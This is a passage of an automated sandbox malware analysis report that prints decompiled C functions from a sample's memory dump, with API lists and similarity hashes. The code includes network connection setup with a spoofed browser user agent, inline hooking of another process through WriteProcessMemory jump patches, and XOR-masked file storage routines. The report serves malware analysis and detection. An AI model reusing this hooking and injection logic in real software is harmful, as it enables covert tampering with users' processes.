    					_t11 = InternetConnectA(_t16, _v8, _a4, 0, 0, 3, 0, 0);
    					if(_t11 == 0) {
    						InternetCloseHandle(_t16);
    						goto L7;
    					}
    				}
    				return _t11;
    			}









    APIs
    • InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 012B50B4
    • InternetSetOptionA.WININET(00000000,00000002,012DB00C,00000004), ref: 012B50D3
    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 012B50EE
    • InternetCloseHandle.WININET(00000000), ref: 012B50FA
    Strings
    • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 012B50A2
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Internet$CloseConnectHandleOpenOption
    • String ID: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
    • API String ID: 910987326-3737944857
    • Opcode ID: 43ad3495a45fa91e734522a28fd8c89776861c1392d9eced6fca8f8b9320ab4e
    • Instruction ID: 3c9330c3b0ee9c45ed667912ebc99f8115c6698fd96062a3d144261d603ecbdc
    • Opcode Fuzzy Hash: 43ad3495a45fa91e734522a28fd8c89776861c1392d9eced6fca8f8b9320ab4e
    • Instruction Fuzzy Hash: 3A01D172520201BFE7329A66EC8CDAB7AAEEBCA7507144408FA26D6041C231C90187B4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 55%
    			E012BBD98(signed int __edx) {
    				char _v8;
    				struct HINSTANCE__* _v12;
    				char _v1036;
    				struct HINSTANCE__* _t13;
    				_Unknown_base(*)()* _t15;
    				char _t20;
    				signed int _t24;
    				void* _t29;
    
    				_t24 = __edx;
    				_t20 = 0;
    				_t13 = LoadLibraryA("urlmon.dll");
    				_v12 = _t13;
    				if(_t13 != 0) {
    					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
    					if(_t15 != 0) {
    						_push( &_v8);
    						_push( &_v1036);
    						_push(0);
    						_v8 = 0x3ff;
    						_v1036 = 0;
    						if( *_t15() == 0) {
    							if(_v8 > 0x3ff) {
    								_v8 = 0x3ff;
    							}
    							 *((char*)(_t29 + _v8 - 0x408)) = _t20;
    							_t20 = L012B12A8( &_v1036, _t24 | 0xffffffff);
    						}
    					}
    					FreeLibrary(_v12);
    				}
    				return _t20;
    			}












    APIs
    • LoadLibraryA.KERNEL32(urlmon.dll), ref: 012BBDA9
    • GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 012BBDBC
    • FreeLibrary.KERNEL32(?), ref: 012BBE0D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Library$AddressFreeLoadProc
    • String ID: ObtainUserAgentString$urlmon.dll
    • API String ID: 145871493-2685262326
    • Opcode ID: b589a408d5a5be801c1de056e7f1d6ad7d750c00c8b0f05ac90fc583106492f4
    • Instruction ID: 700a51a4c2f5ca30fa7156db5aa61f6170ec8ec6a9eadf31e2aeb83d7e40dc3d
    • Opcode Fuzzy Hash: b589a408d5a5be801c1de056e7f1d6ad7d750c00c8b0f05ac90fc583106492f4
    • Instruction Fuzzy Hash: 7D018FB1D11219ABDB219BACEDC89DDBAB8AB04350F6005ADE752F3180DA348B44CB60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 30%
    			E012B830C(char _a4, char _a8) {
    				_Unknown_base(*)()* _t8;
    				intOrPtr _t13;
    				struct HINSTANCE__* _t14;
    
    				_t13 = 0;
    				_t14 = LoadLibraryA("imagehlp.dll");
    				if(_t14 != 0) {
    					_t8 = GetProcAddress(_t14, "CheckSumMappedFile");
    					if(_t8 != 0) {
    						_push( &_a8);
    						_push( &_a4);
    						_push(_a8);
    						_push(_a4);
    						if( *_t8() != 0) {
    							_t13 = _a8;
    						}
    					}
    					FreeLibrary(_t14);
    				}
    				return _t13;
    			}







    APIs
    • LoadLibraryA.KERNEL32(imagehlp.dll), ref: 012B8318
    • GetProcAddress.KERNEL32(00000000,CheckSumMappedFile), ref: 012B832A
    • FreeLibrary.KERNEL32(00000000), ref: 012B834C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Library$AddressFreeLoadProc
    • String ID: CheckSumMappedFile$imagehlp.dll
    • API String ID: 145871493-2656424995
    • Opcode ID: 6877d9aade37d746533141d6273ea812f97c11bec95b004d35b8eece51c957d4
    • Instruction ID: a488db762feb3a961ebb0c7a5eb6fe3a690bcb777c784c450267035328bbf139
    • Opcode Fuzzy Hash: 6877d9aade37d746533141d6273ea812f97c11bec95b004d35b8eece51c957d4
    • Instruction Fuzzy Hash: 9EF0A0372121167797215F9AEC48CDE3B1CEF847A03098024FF198A110DF34D601C7A0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E012BD982(WCHAR* __ecx, signed int __edx, long _a4) {
    				char _v5;
    				signed int _v12;
    				void _v20;
    				struct _OVERLAPPED* _v24;
    				struct _OVERLAPPED* _v28;
    				signed int _v32;
    				signed int _v36;
    				void* __ebx;
    				long _t29;
    				void* _t30;
    				signed int _t32;
    				int _t39;
    				int _t40;
    				signed int _t42;
    				int _t43;
    				int _t46;
    				intOrPtr _t47;
    				long _t52;
    				signed int _t60;
    				struct _OVERLAPPED* _t65;
    				WCHAR* _t68;
    				void** _t69;
    
    				_t60 = __edx;
    				_v12 = __edx;
    				_t2 =  &_v12;
    				 *_t2 = _v12 & 0x00000001;
    				_t68 = __ecx;
    				_t29 = 0x80000000;
    				_v5 = 0;
    				if( *_t2 == 0) {
    					_push(3);
    				} else {
    					_t29 = 0xc0000000;
    					_push(4);
    				}
    				_pop(_t52);
    				_t65 = 0;
    				_t30 = CreateFileW(_t68, _t29, 1, 0, _t52, 0x80, 0);
    				_t69 = _a4;
    				 *_t69 = _t30;
    				if(_t30 != 0xffffffff) {
    					_push(_t47);
    					_t32 = L012B19FB(_t30);
    					_v36 = _t32;
    					_v32 = _t60;
    					if((_t32 & _t60) == 0xffffffff) {
    						L7:
    						CloseHandle( *_t69);
    						 *_t69 =  *_t69 | 0xffffffff;
    					} else {
    						if((_t32 | _t60) == 0) {
    							L22:
    							_v5 = 1;
    							L012B1645(_t47, _t69);
    						} else {
    							_v28 = 0;
    							_v24 = 0;
    							if(ReadFile( *_t69,  &_v20, 5,  &_a4, 0) != 0) {
    								while(1) {
    									__eflags = _a4 - _t65;
    									if(_a4 == _t65) {
    										goto L22;
    									}
    									__eflags = _a4 - 5;
    									if(_a4 != 5) {
    										L19:
    										__eflags = _v12 - _t65;
    										if(_v12 == _t65) {
    											goto L7;
    										} else {
    											_t39 = L012B1703( *_t69, 0, _v28, _v24);
    											__eflags = _t39;
    											if(_t39 == 0) {
    												goto L7;
    											} else {
    												_t40 = SetEndOfFile( *_t69);
    												__eflags = _t40;
    												if(_t40 == 0) {
    													goto L7;
    												} else {
    													goto L22;
    												}
    											}
    										}
    									} else {
    										_t42 = _v20 ^ _t69[4];
    										asm("adc edi, [ebp-0x14]");
    										_t47 = _t42 + _v28 + 5;
    										asm("adc edi, ecx");
    										_v20 = _t42;
    										__eflags = 0 - _v32;
    										if(__eflags > 0) {
    											L18:
    											_t65 = 0;
    											__eflags = 0;
    											goto L19;
    										} else {
    											if(__eflags < 0) {
    												L14:
    												__eflags = _t42 - 0xa00000;
    												if(_t42 > 0xa00000) {
    													goto L18;
    												} else {
    													_t43 = L012B1703( *_t69, 1, _t42, 0);
    													__eflags = _t43;
    													if(_t43 == 0) {
    														goto L7;
    													} else {
    														_v28 = _t47;
    														_v24 = 0;
    														_t46 = ReadFile( *_t69,  &_v20, 5,  &_a4, 0);
    														__eflags = _t46;
    														if(_t46 != 0) {
    															_t65 = 0;
    															__eflags = 0;
    															continue;
    														} else {
    															goto L7;
    														}
    													}
    												}
    											} else {
    												__eflags = _t47 - _v36;
    												if(_t47 > _v36) {
    													goto L18;
    												} else {
    													goto L14;
    												}
    											}
    										}
    									}
    									goto L23;
    								}
    								goto L22;
    							} else {
    								goto L7;
    							}
    						}
    					}
    					L23:
    				}
    				return _v5;
    			}


























    APIs
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 012BD9B8
    • ReadFile.KERNEL32(00000001,?,00000005,00000001,00000000,?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 012BD9FE
    • CloseHandle.KERNEL32(00000001,?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 012BDA0A
    • ReadFile.KERNEL32(00000001,?,00000005,00000005,00000000,?,00000000,?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 012BDA7A
    • SetEndOfFile.KERNEL32(00000001,?,?,?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 012BDAAA
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: File$Read$CloseCreateHandle
    • String ID:
    • API String ID: 1724936099-0
    • Opcode ID: 70ce66275235e8e6906c4f01653f51f52493e8e1761ae44ab4585ec3c72dd7ae
    • Instruction ID: 82f0896b1a1cf300bdc2a9d275ad3332e5380ba7cd2e83b0d27b79791c77c40a
    • Opcode Fuzzy Hash: 70ce66275235e8e6906c4f01653f51f52493e8e1761ae44ab4585ec3c72dd7ae
    • Instruction Fuzzy Hash: 2641C73192420AAFEB24DFA8DCC4BFEBBF9BF88394F184119E651A7180C7715581CB55
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 71%
    			E012B814C(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr _a12) {
    				void* _v8;
    				long _v12;
    				DWORD* _v16;
    				intOrPtr _v51;
    				void _v52;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t45;
    				void* _t59;
    				void* _t64;
    				intOrPtr* _t65;
    				long _t66;
    				DWORD* _t67;
    				void* _t69;
    
    				_t62 = __edx;
    				_t60 = __ecx;
    				_t64 = __ecx;
    				_t59 = __edx;
    				_t67 = 0;
    				_v8 = __ecx;
    				_v16 = 0;
    				if(E012B8102(__edx, __ecx) < 0x1e || VirtualProtectEx(__ecx, __edx, 0x1e, 0x40,  &_v12) == 0) {
    					L17:
    					return _v16;
    				} else {
    					L012B15F5( &_v52,  &_v52, 0xffffff90, 0x23);
    					if(ReadProcessMemory(_t64, _t59,  &_v52, 0x1e, 0) == 0) {
    						L16:
    						VirtualProtectEx(_v8, _t59, 0x1e, _v12,  &_v12);
    						goto L17;
    					} else {
    						_t65 =  &_v52;
    						_push(0);
    						_push(_t65);
    						while(1) {
    							_t45 = E012D3000(_t59, _t60, _t62, _t65, _t67);
    							if(_t45 == 0xffffffff) {
    								break;
    							}
    							_t67 = _t67 + _t45;
    							if(_t67 > 0x1e) {
    								goto L16;
    							}
    							_t60 =  *_t65;
    							if(_t60 == 0xe9 || _t60 == 0xe8) {
    								if(_t45 == 5) {
    									 *((intOrPtr*)(_t65 + 1)) =  *((intOrPtr*)(_t65 + 1)) + _t59 - _a8;
    								}
    							}
    							_push(0);
    							if(_t67 >= 5) {
    								_t13 = _t67 + 5; // 0x5
    								_t66 = _t13;
    								 *((intOrPtr*)(_t69 + _t67 - 0x2f)) = _t59 - _a8 - 5;
    								 *((char*)(_t69 + _t67 - 0x30)) = 0xe9;
    								if(WriteProcessMemory(_v8, _a8,  &_v52, _t66, ??) != 0) {
    									_v52 = 0xe9;
    									_v51 = _a4 - _t59 - 5;
    									_a12();
    									if(WriteProcessMemory(_v8, _t59,  &_v52, 5, 0) != 0) {
    										_v16 = _t66;
    									}
    								}
    								goto L16;
    							}
    							_t65 = _t69 + _t67 - 0x30;
    							_push(_t65);
    						}
    						goto L16;
    					}
    				}
    			}




















    APIs
      • Part of subcall function 012B8102: VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 012B8118
    • VirtualProtectEx.KERNEL32(?,?,0000001E,00000040,?), ref: 012B817C
    • ReadProcessMemory.KERNEL32(?,?,?,0000001E,00000000,?,00000090,00000023,?,?,0000001E,00000040,?), ref: 012B81A0
    • WriteProcessMemory.KERNEL32(?,?,?,00000005,00000000,?,00000000,?,?,?,0000001E,00000000,?,00000090,00000023), ref: 012B8218
    • WriteProcessMemory.KERNEL32(?,?,000000E9,00000005,00000000,?,?,?,0000001E,00000000,?,00000090,00000023,?,?,0000001E), ref: 012B8241
    • VirtualProtectEx.KERNEL32(?,?,0000001E,?,?,?,?,?,0000001E,00000000,?,00000090,00000023,?,?,0000001E), ref: 012B8257
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
    • String ID:
    • API String ID: 390532180-0
    • Opcode ID: 69638ddfe2e40966b5633254269e4cccc5443a520956f80d5cd4acf1508fba50
    • Instruction ID: 1a23429d4d1a36c7979cd0a0a4a48746b783e35e39c927491448d7d7889ce0b5
    • Opcode Fuzzy Hash: 69638ddfe2e40966b5633254269e4cccc5443a520956f80d5cd4acf1508fba50
    • Instruction Fuzzy Hash: F431A271920209BBEF209EADDD88EEEBBBCEF45790F044625FA15E6180C770D9018B60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E012BDACD(void** __ecx, signed int __edx, void* __edi, signed int _a4) {
    				char _v5;
    				long _v12;
    				void* _v16;
    				void _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				signed int _t26;
    				signed int _t30;
    				long _t46;
    				signed int _t53;
    				void** _t59;
    
    				_t53 = __edx;
    				_v16 = __edx;
    				_t59 = __ecx;
    				_v5 = 0;
    				if(_a4 <= 0xa00000) {
    					_t26 = L012B1B8B( *__ecx);
    					_v40 = _t26;
    					_v36 = _t53;
    					if((_t26 & _t53) != 0xffffffff) {
    						_push(2);
    						if(SetFilePointerEx( *__ecx, 0, 0, 0) != 0) {
    							_t30 = L012B1B8B( *_t59);
    							_v32 = _t30;
    							_v28 = _t53;
    							if((_t30 & _t53) != 0xffffffff) {
    								L012B15F5( &_v24,  &_v24, 0, 5);
    								_v24 = _t59[4] ^ _a4;
    								if(WriteFile( *_t59,  &_v24, 5,  &_v12, 0) == 0 || _v12 != 5) {
    									L9:
    									L012B1703( *_t59, 0, _v32, _v28);
    									SetEndOfFile( *_t59);
    								} else {
    									_t46 = _a4;
    									if(WriteFile( *_t59, _v16, _t46,  &_v12, 0) == 0 || _v12 != _t46) {
    										goto L9;
    									} else {
    										_v5 = 1;
    									}
    								}
    							}
    							FlushFileBuffers( *_t59);
    							L012B1703( *_t59, 0, _v40, _v36);
    						}
    					}
    				}
    				return _v5;
    			}

















    APIs
    • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 012BDB0E
    • WriteFile.KERNEL32(?,?,00000005,00A00000,00000000,?,00000000,00000005), ref: 012BDB59
    • WriteFile.KERNEL32(?,?,00000005,00000005,00000000,?,?,00000005,00A00000,00000000,?,00000000,00000005), ref: 012BDB73
    • SetEndOfFile.KERNEL32(?,?,?,?,?,00000005,00A00000,00000000,?,00000000,00000005), ref: 012BDB95
    • FlushFileBuffers.KERNEL32 ref: 012BDB9E
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: File$Write$BuffersFlushPointer
    • String ID:
    • API String ID: 848727363-0
    • Opcode ID: ea0eb6e29bfe26f1ccc92aa136a690c45b19a8e607d38636a94b2035d647906a
    • Instruction ID: 6d7e00d23a3798ed2dfcba745764b86e3476c7a69fd821aa0bd9b30db8ec7e37
    • Opcode Fuzzy Hash: ea0eb6e29bfe26f1ccc92aa136a690c45b19a8e607d38636a94b2035d647906a
    • Instruction Fuzzy Hash: DD314D7591020EEFDB24DFE8D8C4EEEBBB9EF48394F108529E641A6150E7359941CF60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012C6660(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
    				void* _v8;
    				long _v12;
    				void* _v16;
    				char _v32;
    				void _v360;
    				short _v880;
    				void* _t26;
    				long _t38;
    				void* _t41;
    				void* _t43;
    				long _t53;
    
    				_v16 = __edx;
    				_t41 = 0x2c;
    				L012B1479(_t41,  &_v32);
    				if(L012B1203( &_v880, __ecx,  &_v32) == 0) {
    					L11:
    					return 1;
    				}
    				_t26 = CreateFileW( &_v880, 0x40000000, 1, 0, 2, 0x80, 0);
    				_v8 = _t26;
    				if(_t26 == 0xffffffff) {
    					goto L11;
    				}
    				_t43 = 0x31;
    				_t38 = 0;
    				L012B165E(_t43,  &_v360);
    				if(WriteFile(_v8,  &_v360, 0x146,  &_v12, 0) == 0 || _v12 != 0x146) {
    					L9:
    					FlushFileBuffers(_v8);
    					CloseHandle(_v8);
    					if(_t38 == 0) {
    						L012B1640( &_v880);
    					}
    					goto L11;
    				} else {
    					if(_v16 == 0) {
    						L7:
    						_t38 = 1;
    						goto L9;
    					}
    					_t53 = L012B1BE0(_v16);
    					if(WriteFile(_v8, _v16, _t53,  &_v12, 0) == 0 || _v12 != _t53) {
    						_t38 = 0;
    						goto L9;
    					} else {
    						goto L7;
    					}
    				}
    			}















    APIs
    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?), ref: 012C66AC
    • WriteFile.KERNEL32(?,?,00000146,?,00000000), ref: 012C66EB
    • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 012C6713
    • FlushFileBuffers.KERNEL32(?), ref: 012C6727
    • CloseHandle.KERNEL32(?), ref: 012C6730
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: File$Write$BuffersCloseCreateFlushHandle
    • String ID:
    • API String ID: 873259163-0
    • Opcode ID: dcc5b790b7364224774fd91cec87a72631e1538f7253dfa257eeaac0ecc1b1a8
    • Instruction ID: ed701369524d1fc80b17662b39062e34dc188d2cfa38bbdc3f02e4c071f965a8
    • Opcode Fuzzy Hash: dcc5b790b7364224774fd91cec87a72631e1538f7253dfa257eeaac0ecc1b1a8
    • Instruction Fuzzy Hash: B521AD71D10119FBDF259AA4EC48FEE7BB8EF40790F1441A6E610A6194EB319A08CF50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E012C36A2(void* __esi, void* __eflags) {
    				char _v84;
    				char _v344;
    				char _v604;
    				char _v864;
    				short _v1384;
    				short _v1904;
    				char _v3044;
    				void* _t51;
    				void* _t54;
    				void* _t56;
    				void* _t69;
    
    				_t69 = __eflags;
    				L012B15E6(1,  &_v1904);
    				PathRemoveFileSpecW( &_v1904);
    				_t51 = 2;
    				L012B15E6(_t51,  &_v1384);
    				PathRemoveFileSpecW( &_v1384);
    				 *0x12dc738 =  *0x12dc738 | 0x00000002;
    				E012C3307();
    				L012B146A();
    				L012B196F( &_v1904, _t69);
    				L012B196F( &_v1384, _t69);
    				_t54 = 3;
    				L012B15E6(_t54,  &_v864);
    				L012B1681(0x80000001,  &_v864);
    				CharToOemW( &_v1904,  &_v604);
    				CharToOemW( &_v1384,  &_v344);
    				_t56 = 8;
    				L012B165E(_t56,  &_v84);
    				_push( &_v344);
    				_push( &_v604);
    				_push( &_v344);
    				if(L012B1BA9( &_v3044, 0x474,  &_v84,  &_v604) > 0) {
    					L012B1087( &_v3044);
    				}
    				if( *0x12dcc58 == 0xffffffff) {
    					ExitProcess(0);
    				}
    				return 1;
    			}















    APIs
    • PathRemoveFileSpecW.SHLWAPI(?), ref: 012C36C7
    • PathRemoveFileSpecW.SHLWAPI(?), ref: 012C36DE
      • Part of subcall function 012C3307: SetEvent.KERNEL32(012C36EC), ref: 012C330D
      • Part of subcall function 012C3307: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012C3320
    • CharToOemW.USER32 ref: 012C3739
    • CharToOemW.USER32 ref: 012C3749
    • ExitProcess.KERNEL32 ref: 012C37A5
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CharFilePathRemoveSpec$EventExitObjectProcessSingleWait
    • String ID:
    • API String ID: 57584400-0
    • Opcode ID: bda0151d10958ff56ad605f7208639ce34346c618bcc03cff509328f633b9450
    • Instruction ID: d62f0e9d782bc97ed027b87d5c2589c3bc3393ec4b35657629fdaac562663264
    • Opcode Fuzzy Hash: bda0151d10958ff56ad605f7208639ce34346c618bcc03cff509328f633b9450
    • Instruction Fuzzy Hash: E9219472C1062D9ACB20E7A0ED94EEE737CEB14351F0046D69509A7084EF74AB88CF90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012C299C(void* __ebx, void* __edi, void* __esi) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v104;
    				char _v204;
    				short _v724;
    				void* _t14;
    				intOrPtr _t18;
    				long _t27;
    				void* _t43;
    				void* _t55;
    
    				L012B1654(_t14);
    				SetThreadPriority(GetCurrentThread(), 0);
    				_t18 = L012B1780(0x19367402, 1);
    				_v12 = _t18;
    				if(_t18 != 0) {
    					L012B137F(0xff220829,  &_v204, 0);
    					L012B15E6(1,  &_v724);
    					PathQuoteSpacesW( &_v724);
    					_v8 = L012B18B6( &_v724);
    					if(L012B150A() == 0) {
    						L7:
    						L012B1492(_v12);
    						return 0;
    					}
    					_t43 = 4;
    					L012B1479(_t43,  &_v104);
    					_t55 = WaitForSingleObject;
    					_t27 = WaitForSingleObject( *0x12dcc54, 0xc8);
    					while(_t27 == 0x102) {
    						L012B14D3( &_v204,  &_v724, _v8);
    						_t27 = WaitForSingleObject( *0x12dcc54, 0xc8);
    					}
    					L012B1488(_t55);
    					goto L7;
    				}
    				return _t18 + 1;
    			}














    APIs
    • GetCurrentThread.KERNEL32 ref: 012C29AE
    • SetThreadPriority.KERNEL32(00000000), ref: 012C29B5
    • PathQuoteSpacesW.SHLWAPI(?,00000000), ref: 012C29FB
    • WaitForSingleObject.KERNEL32(000000C8), ref: 012C2A38
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
